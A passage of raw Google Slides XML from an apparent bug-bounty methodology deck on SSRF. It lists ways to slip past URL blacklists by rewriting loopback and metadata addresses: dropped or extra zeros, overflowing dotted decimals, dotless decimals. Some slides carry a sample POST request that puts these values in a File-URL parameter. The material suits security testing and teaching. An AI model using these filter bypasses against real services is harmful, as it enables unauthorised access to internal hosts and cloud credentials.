          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Google Shape;493;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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94" name="Google Shape;494;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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5" name="Google Shape;495;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="Google Shape;496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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="498" name="Google Shape;498;p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2925" y="3110050"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Google Shape;499;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189325" y="3081550"/>
            <a:ext cx="1954200" cy="285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0" name="Google Shape;500;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="501" name="Google Shape;501;p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2925" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Drop The Zeros </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. http://127.0.0.1 → http://127.1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Google Shape;507;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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508" name="Google Shape;508;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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9" name="Google Shape;509;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="510" name="Google Shape;510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538" y="-146801"/>
            <a:ext cx="1216525" cy="118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1" name="Google Shape;511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36000" y="2675525"/>
            <a:ext cx="4973701" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="Google Shape;512;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="513" name="Google Shape;513;p6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2925" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Add </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extra Zeros e.g. https://127.000.000.00000000001</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Google Shape;519;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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520" name="Google Shape;520;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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1" name="Google Shape;521;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="522" name="Google Shape;522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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Google Shape;523;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="524" name="Google Shape;524;p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2925" y="2675525"/>
            <a:ext cx="503200" cy="36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" name="Google Shape;525;p6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36000" y="2675525"/>
            <a:ext cx="4973700" cy="207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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dotted Decimal With Overflow e.g. http://425.510.425.510/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Google Shape;531;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://425.510.425.510/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Google Shape;532;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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533" name="Google Shape;533;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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4" name="Google Shape;534;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="535" name="Google Shape;535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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="Google Shape;536;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="537" name="Google Shape;537;p6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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dotless Decimal e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://2852039166/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Google Shape;543;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://2852039166/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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545" name="Google Shape;545;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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6" name="Google Shape;546;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="547" name="Google Shape;547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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Google Shape;548;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="549" name="Google Shape;549;p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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dotless Decimal </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With Overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://7147006462/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Google Shape;555;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://7147006462/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Google Shape;556;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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557" name="Google Shape;557;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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8" name="Google Shape;558;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="559" name="Google Shape;559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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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0" name="Google Shape;560;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="561" name="Google Shape;561;p6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2938" y="2675525"/>
